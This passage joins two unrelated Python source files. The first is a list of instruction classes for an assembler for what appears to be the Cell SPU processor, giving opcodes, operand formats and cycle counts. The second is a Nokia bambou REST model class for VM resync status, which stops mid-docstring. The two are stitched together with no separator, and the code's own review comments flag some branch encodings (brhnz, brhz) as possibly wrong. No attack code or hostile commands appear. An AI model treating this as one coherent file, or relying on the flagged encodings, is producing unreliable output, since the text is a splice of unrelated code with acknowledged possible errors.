class gbb(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':434}
  cycles = (1, 4, 0)


class gbh(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':433}
  cycles = (1, 4, 0)


class gb(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':432}
  cycles = (1, 4, 0)


class avgb(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':211}
  cycles = (0, 4, 0)


class absdb(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':83}
  cycles = (0, 4, 0)


class sumb(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':595}
  cycles = (0, 4, 0)


class xsbh(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':694}
  cycles = (0, 2, 0)


class xshw(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':686}
  cycles = (0, 2, 0)


class xswd(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':678}
  cycles = (0, 2, 0)


class and_(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':193}
  cycles = (0, 2, 0)


class andc(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':705}
  cycles = (0, 2, 0)


class or_(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':65}
  cycles = (0, 2, 0)


class orc(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':713}
  cycles = (0, 2, 0)


class orx(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':496}
  cycles = (1, 4, 0)


class xor(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':577}
  cycles = (0, 2, 0)


class nand(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':201}
  cycles = (0, 2, 0)


class nor(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':73}
  cycles = (0, 2, 0)


class eqv(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':585}
  cycles = (0, 2, 0)


class shlh(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':95}
  cycles = (0, 4, 0)


class shl(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':91}
  cycles = (0, 4, 0)


class shlqbi(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':475}
  cycles = (1, 4, 0)


class shlqby(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':479}
  cycles = (1, 4, 0)


class shlqbybi(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':463}
  cycles = (1, 4, 0)


class roth(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':92}
  cycles = (0, 4, 0)


class rot(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':88}
  cycles = (0, 4, 0)


class rotqby(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':476}
  cycles = (1, 4, 0)


class rotqbybi(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':460}
  cycles = (1, 4, 0)


class rotqbi(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':472}
  cycles = (1, 4, 0)


class rothm(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':93}
  cycles = (0, 4, 0)


class rotm(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':89}
  cycles = (0, 4, 0)


class rotqmby(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':477}
  cycles = (1, 4, 0)


class rotqmbybi(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':461}
  cycles = (1, 4, 0)


class rotqmbi(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':473}
  cycles = (1, 4, 0)


class rotmah(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':94}
  cycles = (0, 4, 0)


class rotma(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':90}
  cycles = (0, 4, 0)


class heq(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':984}
  cycles = (0, 2, 0)


class hgt(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':600}
  cycles = (0, 2, 0)


class hlgt(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':728}
  cycles = (0, 2, 0)


class ceqb(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':976}
  cycles = (0, 2, 0)


class ceqh(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':968}
  cycles = (0, 2, 0)


class ceq(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':960}
  cycles = (0, 2, 0)


class cgtb(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':592}
  cycles = (0, 2, 0)


class cgth(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':584}
  cycles = (0, 2, 0)


class cgt(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':576}
  cycles = (0, 2, 0)


class clgtb(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':720}
  cycles = (0, 2, 0)


class clgth(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':712}
  cycles = (0, 2, 0)


class clgt(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':704}
  cycles = (0, 2, 0)


class bi(Instruction):
  machine_inst = OPCD_A_D_E
  params = {'OPCD':424}
  cycles = (1, 4, 0)


class iret(Instruction):
  machine_inst = OPCD_A_D_E
  params = {'OPCD':426}
  cycles = (1, 4, 0)


class bisled(Instruction):
  machine_inst = OPCD_A_T_D_E
  params = {'OPCD':427}
  cycles = (1, 4, 0)


class bisl(Instruction):
  machine_inst = OPCD_A_T_D_E
  params = {'OPCD':425}
  cycles = (1, 4, 0)


class biz(Instruction):
  machine_inst = OPCD_A_T_D_E
  params = {'OPCD':296}
  cycles = (1, 4, 0)


class binz(Instruction):
  machine_inst = OPCD_A_T_D_E
  params = {'OPCD':297}
  cycles = (1, 4, 0)


class bihz(Instruction):
  machine_inst = OPCD_A_T_D_E
  params = {'OPCD':294}
  cycles = (1, 4, 0)


class bihnz(Instruction):
  machine_inst = OPCD_A_T_D_E
  params = {'OPCD':299}
  cycles = (1, 4, 0)


# TODO - can we check that if P is set then RO is zero as required?
class hbr(DispatchInstruction):
  """Branch hint (register-target form), opcode 428.

  Dispatches between two operand encodings of the same opcode:
  OPCD_RO_A_P (numeric relative offset) and OPCD_LBL9_A_P (label
  resolved to the 9-bit offset).  See the TODO above about the
  P/RO constraint, which is not validated here.
  """
  cycles = (1, 15, 0)
  dispatch = (
    (OPCD_RO_A_P,   {'OPCD':428}),
    (OPCD_LBL9_A_P, {'OPCD':428}))


class fa(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':708}
  cycles = (0, 6, 0)


class dfa(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':716}
  cycles = (0, 13, 6)


class fs(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':709}
  cycles = (0, 6, 0)


class dfs(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':717}
  cycles = (0, 13, 6)


class fm(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':710}
  cycles = (0, 6, 0)


class dfm(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':718}
  cycles = (0, 13, 6)


class dfma(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':860}
  cycles = (0, 13, 6)


class dfnms(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':862}
  cycles = (0, 13, 6)


class dfms(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':861}
  cycles = (0, 13, 6)


class dfnma(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':863}
  cycles = (0, 13, 6)


class frest(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':440}
  cycles = (1, 4, 0)


class frsqest(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':441}
  cycles = (1, 4, 0)


class fi(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':980}
  cycles = (0, 7, 0)


class frds(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':953}
  cycles = (0, 13, 6)


class fesd(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':952}
  cycles = (0, 13, 6)


class fceq(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':962}
  cycles = (0, 2, 0)


class fcmeq(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':970}
  cycles = (0, 2, 0)


class fcgt(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':706}
  cycles = (0, 2, 0)


class fcmgt(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':714}
  cycles = (0, 2, 0)


class fscrwr(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':954}
  cycles = (0, 7, 0)


class fscrrd(Instruction):
  machine_inst = OPCD_T
  params = {'OPCD':920}
  cycles = (0, 13, 6)


class stop(Instruction):
  machine_inst = OPCD_STOP_SIG
  params = {'OPCD':0}
  cycles = (1, 4, 0)


class stopd(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':320}
  cycles = (1, 4, 0)


class lnop(Instruction):
  machine_inst = OPCD
  params = {'OPCD':1}
  cycles = (1, 0, 0)


class nop(Instruction):
  machine_inst = OPCD_T
  params = {'OPCD':513}
  cycles = (0, 0, 0)


class sync(Instruction):
  machine_inst = OPCD_CF
  params = {'OPCD':2}
  cycles = (1, 4, 0)


class dsync(Instruction):
  machine_inst = OPCD
  params = {'OPCD':3}
  cycles = (1, 4, 0)


class mfspr(Instruction):
  machine_inst = OPCD_SA_T
  params = {'OPCD':12}
  cycles = (1, 6, 0)


class mtspr(Instruction):
  machine_inst = OPCD_SA_T
  params = {'OPCD':268}
  cycles = (1, 6, 0)


class rdch(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':13}
  cycles = (1, 6, 0)


class rchcnt(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':15}
  cycles = (1, 6, 0)


class wrch(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':269}
  cycles = (1, 6, 0)


class mpya(Instruction):
  machine_inst = OPCD_T_B_A_C
  params = {'OPCD':12}
  cycles = (0, 7, 0)


class selb(Instruction):
  machine_inst = OPCD_T_B_A_C
  params = {'OPCD':8}
  cycles = (0, 2, 0)


class shufb(Instruction):
  machine_inst = OPCD_T_B_A_C
  params = {'OPCD':11}
  cycles = (1, 4, 0)


class fma(Instruction):
  machine_inst = OPCD_T_B_A_C
  params = {'OPCD':14}
  cycles = (0, 6, 0)


class fnms(Instruction):
  machine_inst = OPCD_T_B_A_C
  params = {'OPCD':13}
  cycles = (0, 6, 0)


class fms(Instruction):
  machine_inst = OPCD_T_B_A_C
  params = {'OPCD':15}
  cycles = (0, 6, 0)


class cbd(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':500}
  cycles = (1, 4, 0)


class chd(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':501}
  cycles = (1, 4, 0)


class cwd(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':502}
  cycles = (1, 4, 0)


class cdd(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':503}
  cycles = (1, 4, 0)


class shlhi(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':127}
  cycles = (0, 4, 0)


class shli(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':123}
  cycles = (0, 4, 0)


class shlqbii(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':507}
  cycles = (1, 4, 0)


class shlqbyi(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':511}
  cycles = (1, 4, 0)


class rothi(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':124}
  cycles = (0, 4, 0)


class roti(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':120}
  cycles = (0, 4, 0)


class rotqbyi(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':508}
  cycles = (1, 4, 0)


class rotqbii(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':504}
  cycles = (1, 4, 0)


class rothmi(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':125}
  cycles = (0, 4, 0)


class rotmi(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':121}
  cycles = (0, 4, 0)


class rotqmbyi(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':509}
  cycles = (1, 4, 0)


class rotqmbii(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':505}
  cycles = (1, 4, 0)


class rotmahi(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':126}
  cycles = (0, 4, 0)


class rotmai(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':122}
  cycles = (0, 4, 0)


class csflt(Instruction):
  machine_inst = OPCD_I8_A_T
  params = {'OPCD':474}
  cycles = (0, 7, 0)


class cflts(Instruction):
  machine_inst = OPCD_I8_A_T
  params = {'OPCD':472}
  cycles = (0, 7, 0)


class cuflt(Instruction):
  machine_inst = OPCD_I8_A_T
  params = {'OPCD':475}
  cycles = (0, 7, 0)


class cfltu(Instruction):
  machine_inst = OPCD_I8_A_T
  params = {'OPCD':473}
  cycles = (0, 7, 0)


class lqd(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':52}
  cycles = (1, 6, 0)


class stqd(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':36}
  cycles = (1, 6, 0)


class ahi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':29}
  cycles = (0, 2, 0)


class ai(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':28}
  cycles = (0, 2, 0)


class sfhi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':13}
  cycles = (0, 2, 0)


class sfi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':12}
  cycles = (0, 2, 0)


class mpyi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':116}
  cycles = (0, 7, 0)


class mpyui(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':117}
  cycles = (0, 7, 0)


class andbi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':22}
  cycles = (0, 2, 0)


class andhi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':21}
  cycles = (0, 2, 0)


class andi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':20}
  cycles = (0, 2, 0)


class orbi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':6}
  cycles = (0, 2, 0)


class orhi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':5}
  cycles = (0, 2, 0)


class ori(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':4}
  cycles = (0, 2, 0)


class xorbi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':70}
  cycles = (0, 2, 0)


class xorhi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':69}
  cycles = (0, 2, 0)


class xori(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':68}
  cycles = (0, 2, 0)


class heqi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':127}
  cycles = (0, 2, 0)


class hgti(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':79}
  cycles = (0, 2, 0)


class hlgti(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':95}
  cycles = (0, 2, 0)


class ceqbi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':126}
  cycles = (0, 2, 0)


class ceqhi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':125}
  cycles = (0, 2, 0)


class ceqi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':124}
  cycles = (0, 2, 0)


class cgtbi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':78}
  cycles = (0, 2, 0)


class cgthi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':77}
  cycles = (0, 2, 0)


class cgti(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':76}
  cycles = (0, 2, 0)


class clgtbi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':94}
  cycles = (0, 2, 0)


class clgthi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':93}
  cycles = (0, 2, 0)


class clgti(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':92}
  cycles = (0, 2, 0)


class lqa(Instruction):
  machine_inst = OPCD_I16_T
  params = {'OPCD':97}
  cycles = (1, 6, 0)


class lqr(Instruction):
  machine_inst = OPCD_I16_T
  params = {'OPCD':103}
  cycles = (1, 6, 0)


class stqa(Instruction):
  machine_inst = OPCD_I16_T
  params = {'OPCD':65}
  cycles = (1, 6, 0)


class stqr(Instruction):
  machine_inst = OPCD_I16_T
  params = {'OPCD':71}
  cycles = (1, 6, 0)


class ilh(Instruction):
  machine_inst = OPCD_I16_T
  params = {'OPCD':131}
  cycles = (0, 2, 0)


class ilhu(Instruction):
  machine_inst = OPCD_I16_T
  params = {'OPCD':130}
  cycles = (0, 2, 0)


class il(Instruction):
  machine_inst = OPCD_I16_T
  params = {'OPCD':129}
  cycles = (0, 2, 0)


class iohl(Instruction):
  machine_inst = OPCD_I16_T
  params = {'OPCD':193}
  cycles = (0, 2, 0)


class fsmbi(Instruction):
  machine_inst = OPCD_I16_T
  params = {'OPCD':101}
  cycles = (1, 4, 0)


class br(DispatchInstruction):
  """Unconditional relative branch, opcode 100.

  Same opcode with either an immediate 16-bit offset (OPCD_I16)
  or a label operand (OPCD_LBL16) that is resolved to the offset.
  """
  cycles = (1, 4, 0)
  dispatch = (
    (OPCD_I16,    {'OPCD':100}),
    (OPCD_LBL16,  {'OPCD':100}))


# TODO - how can I do absolute branches?
class bra(Instruction):
  """Absolute branch, opcode 96.

  Only the immediate (OPCD_I16) form is provided -- no label form,
  per the open TODO above about absolute branch targets.
  """
  machine_inst = OPCD_I16
  params = {'OPCD':96}
  cycles = (1, 4, 0)


# TODO - I16 has two zero bits appended, do I handle this correctly?
# What is the correct way, anyway?
class brsl(DispatchInstruction):
  """Relative branch and set link (register T), opcode 102.

  Immediate (OPCD_I16_T) or label (OPCD_LBL16_T) target forms.
  """
  cycles = (1, 4, 0)
  dispatch = (
    (OPCD_I16_T,    {'OPCD':102}),
    (OPCD_LBL16_T,  {'OPCD':102}))


class brasl(Instruction):
  """Absolute branch and set link, opcode 98 (immediate form only)."""
  machine_inst = OPCD_I16_T
  params = {'OPCD':98}
  cycles = (1, 4, 0)


class brnz(DispatchInstruction):
  """Relative branch if register T is not zero, opcode 66.

  Immediate (OPCD_I16_T) or label (OPCD_LBL16_T) target forms.
  """
  cycles = (1, 4, 0)
  dispatch = (
    (OPCD_I16_T,    {'OPCD':66}),
    (OPCD_LBL16_T,  {'OPCD':66}))


class brz(DispatchInstruction):
  """Relative branch if register T is zero, opcode 64.

  Immediate (OPCD_I16_T) or label (OPCD_LBL16_T) target forms.
  """
  cycles = (1, 4, 0)
  dispatch = (
    (OPCD_I16_T,    {'OPCD':64}),
    (OPCD_LBL16_T,  {'OPCD':64}))


class brhnz(DispatchInstruction):
  """Relative branch if halfword not zero, opcode 70.

  NOTE(review): unlike brnz/brz this dispatches on OPCD_I16 /
  OPCD_LBL16, i.e. with no T (register) field, yet the SPU brhnz
  instruction tests the preferred halfword of a register operand.
  Verify these formats should not be OPCD_I16_T / OPCD_LBL16_T.
  """
  cycles = (1, 4, 0)
  dispatch = (
    (OPCD_I16,    {'OPCD':70}),
    (OPCD_LBL16,  {'OPCD':70}))


class brhz(DispatchInstruction):
  """Relative branch if halfword zero, opcode 68.

  NOTE(review): same concern as brhnz -- dispatch uses OPCD_I16 /
  OPCD_LBL16 without the T (register) field that brnz/brz carry;
  confirm against the SPU ISA whether OPCD_I16_T / OPCD_LBL16_T
  were intended.
  """
  cycles = (1, 4, 0)
  dispatch = (
    (OPCD_I16,    {'OPCD':68}),
    (OPCD_LBL16,  {'OPCD':68}))


class hbra(Instruction):
  """Branch hint, absolute target (label + 16-bit immediate), opcode 8."""
  machine_inst = OPCD_LBL9_I16
  params = {'OPCD':8}
  cycles = (1, 15, 0)


class hbrr(DispatchInstruction):
  """Branch hint, relative target, opcode 9.

  Dispatches between a numeric (OPCD_ROA_I16) and a fully labelled
  (OPCD_LBL9_LBL16) operand encoding of the same opcode.
  """
  cycles = (1, 15, 0)
  dispatch = (
    (OPCD_ROA_I16,     {'OPCD':9}),
    (OPCD_LBL9_LBL16,  {'OPCD':9}))


class ila(Instruction):
  """Immediate load address (18-bit immediate into register T), opcode 33."""
  machine_inst = OPCD_I18_T
  params = {'OPCD':33}
  cycles = (0, 2, 0)



# -*- coding: utf-8 -*-
#
# Copyright (c) 2015, Alcatel-Lucent Inc, 2017 Nokia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#     * Redistributions of source code must retain the above copyright
#       notice, this list of conditions and the following disclaimer.
#     * Redistributions in binary form must reproduce the above copyright
#       notice, this list of conditions and the following disclaimer in the
#       documentation and/or other materials provided with the distribution.
#     * Neither the name of the copyright holder nor the names of its contributors
#       may be used to endorse or promote products derived from this software without
#       specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.




from .fetchers import NUPermissionsFetcher


from .fetchers import NUMetadatasFetcher


from .fetchers import NUGlobalMetadatasFetcher

from bambou import NURESTObject


class NUVMResync(NURESTObject):
    """ Represents a VMResync in the VSD

        Notes:
            Provide information about the state of a VM resync request.
    """

    # REST path fragments used by bambou to build URLs for this entity.
    __rest_name__ = "resync"
    __resource_name__ = "resync"

    
    ## Constants
    
    # Allowed values for the `status` attribute.
    CONST_STATUS_IN_PROGRESS = "IN_PROGRESS"
    
    CONST_ENTITY_SCOPE_GLOBAL = "GLOBAL"
    
    CONST_STATUS_SUCCESS = "SUCCESS"
    
    # Allowed values for the `entity_scope` attribute.
    CONST_ENTITY_SCOPE_ENTERPRISE = "ENTERPRISE"
    
    

    def __init__(self, **kwargs):
        """ Initializes a VMResync instance

            Notes:
                You can specify all parameters while calling this methods.
                A special argument named `data` will enable you to load the
                object from a Python dictionary

            Examples:
                >>> vmresync = NUVMResync(id=u'xxxx-xxx-xxx-xxx', name=u'VMResync')
                >>> vmresync = NUVMResync(data=my_dict)
        """

        super(NUVMResync, self).__init__()

        # Read/Write Attributes
        
        self._last_request_timestamp = None   # int -- presumably an epoch timestamp; TODO confirm units
        self._last_time_resync_initiated = None   # int -- presumably an epoch timestamp; TODO confirm units
        self._last_updated_by = None
        self._last_updated_date = None
        self._embedded_metadata = None
        self._entity_scope = None
        self._creation_date = None
        self._status = None
        self._owner = None
        self._external_id = None
        
        # Wire each local (snake_case) attribute to its remote (camelCase)
        # VSD API name; bambou uses these for (de)serialization/validation.
        self.expose_attribute(local_name="last_request_timestamp", remote_name="lastRequestTimestamp", attribute_type=int, is_required=False, is_unique=False)
        self.expose_attribute(local_name="last_time_resync_initiated", remote_name="lastTimeResyncInitiated", attribute_type=int, is_required=False, is_unique=False)
        self.expose_attribute(local_name="last_updated_by", remote_name="lastUpdatedBy", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="last_updated_date", remote_name="lastUpdatedDate", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="embedded_metadata", remote_name="embeddedMetadata", attribute_type=list, is_required=False, is_unique=False)
        self.expose_attribute(local_name="entity_scope", remote_name="entityScope", attribute_type=str, is_required=False, is_unique=False, choices=[u'ENTERPRISE', u'GLOBAL'])
        self.expose_attribute(local_name="creation_date", remote_name="creationDate", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="status", remote_name="status", attribute_type=str, is_required=False, is_unique=False, choices=[u'IN_PROGRESS', u'SUCCESS'])
        self.expose_attribute(local_name="owner", remote_name="owner", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="external_id", remote_name="externalID", attribute_type=str, is_required=False, is_unique=True)
        

        # Fetchers
        
        # Lazy REST collections for child objects of this entity.
        self.permissions = NUPermissionsFetcher.fetcher_with_object(parent_object=self, relationship="child")
        
        
        self.metadatas = NUMetadatasFetcher.fetcher_with_object(parent_object=self, relationship="child")
        
        
        self.global_metadatas = NUGlobalMetadatasFetcher.fetcher_with_object(parent_object=self, relationship="child")
        

        # Apply the caller's keyword arguments (including the special
        # `data` dictionary) to the attributes exposed above.
        self._compute_args(**kwargs)

    # Properties
    
    @property
    def last_request_timestamp(self):
        """ Get last_request_timestamp value.

            Notes:
                Time of the last timestamp received

                
                This attribute is named `lastRequestTimestamp` in VSD API.
                
        """
        return self._last_request_timestamp

    @last_request_timestamp.setter
    def last_request_timestamp(self, value):
        """ Set last_request_timestamp value.

            Notes:
                Time of the last timestamp received

                
                This attribute is named `lastRequestTimestamp` in VSD API.
                
        """
        self._last_request_timestamp = value

    
    @property
    def last_time_resync_initiated(self):
        """ Get last_time_resync_initiated value.

            Notes:
                Time that the resync was initiated

                
                This attribute is named `lastTimeResyncInitiated` in VSD API.
                
        """
        return self._last_time_resync_initiated

    @last_time_resync_initiated.setter
    def last_time_resync_initiated(self, value):
        """ Set last_time_resync_initiated value.

            Notes:
                Time that the resync was initiated

                
                This attribute is named `lastTimeResyncInitiated` in VSD API.
                
        """
        self._last_time_resync_initiated = value

    
    @property
    def last_updated_by(self):
        """ Get last_updated_by value.

            Notes:
                ID of the user who last updated the object.

                
                This attribute is named `lastUpdatedBy` in VSD API.
                
        """
        return self._last_updated_by

    @last_updated_by.setter
    def last_updated_by(self, value):
        """ Set last_updated_by value.

            Notes:
                ID of the user who last updated the object.

                
                This attribute is named `lastUpdatedBy` in VSD API.
                
        """
        self._last_updated_by = value

    
    @property
    def last_updated_date(self):
        """ Get last_updated_date value.

            Notes:
                Time stamp when this object was last updated.

                
                This attribute is named `lastUpdatedDate` in VSD API.
                
        """
        return self._last_updated_date

    @last_updated_date.setter
    def last_updated_date(self, value):
        """ Set last_updated_date value.

            Notes:
                Time stamp when this object was last updated.

                
                This attribute is named `lastUpdatedDate` in VSD API.
                
        """
        self._last_updated_date = value

    
    @property
    def embedded_metadata(self):
        """ Get embedded_metadata value.

            Notes:
                Metadata objects associated with this entity. This will contain a list of Metadata objects if the API request is made using the special flag to enable the embedded Metadata feature. Only a maximum of Metadata objects is returned based on the value set in the system configuration.

                
                This attribute is named `embeddedMetadata` in VSD API.
                
        """
        return self._embedded_metadata

    @embedded_metadata.setter
    def embedded_metadata(self, value):
        """ Set embedded_metadata value.

            Notes:
                Metadata objects associated with this entity. This will contain a list of Metadata objects if the API request is made using the special flag to enable the embedded Metadata feature. Only a maximum of Metadata objects is returned based on the value set in the system configuration.

                
                This attribute is named `embeddedMetadata` in VSD API.
                
        """
        self._embedded_metadata = value

    
    @property
    def entity_scope(self):
        """ Get entity_scope value.

            Notes:
                Specify if scope of entity is Data center or Enterprise level

                
                This attribute is named `entityScope` in VSD API.
                
        """
        return self._entity_scope

    @entity_scope.setter
    def entity_scope(self, value):
        """ Set entity_scope value.

            Notes:
                Specify if scope of entity is Data center or Enterprise level

                
                This attribute is named `entityScope` in VSD API.
                
        """
        self._entity_scope = value

    
    @property
    def creation_date(self):
        """ Get creation_date value.

            Notes:
                Time stamp when this object was created.

                
                This attribute is named `creationDate` in VSD API.
                
        """
        return self._creation_date

    @creation_date.setter
    def creation_date(self, value):
        """ Set creation_date value.

            Notes:
                Time stamp when this object was created.

                
                This attribute is named `creationDate` in VSD API.
                
        """
        self._creation_date = value

    
    @property
    def status(self):
        """ Get status value.

            Notes:
                Status of the resync

                
        """
        return self._status

    @status.setter
    def status(self, value):
        """ Set status value.

            Notes:
                Status of the resync

                
        """
        self._status = value

    
    @property
    def owner(self):
        """ Get owner value.

            Notes:
                Identifies the user that has created this object.

                
        """
        return self._owner

    @owner.setter
    def owner(self, value):
        """ Set owner value.

            Notes:
                Identifies the user that has created this object.

                
        """
        self._owner = value

    
    @property
    def external_id(self):
        """ Get external_id value.

            Notes:
                External object ID. Used for integration with third party systems

                
                This attribute is named `externalID` in VSD API.
                
        """
        return self._external_id

    @external_id.setter
    def external_id(self, value):
        """ Set external_id value.

            Notes:
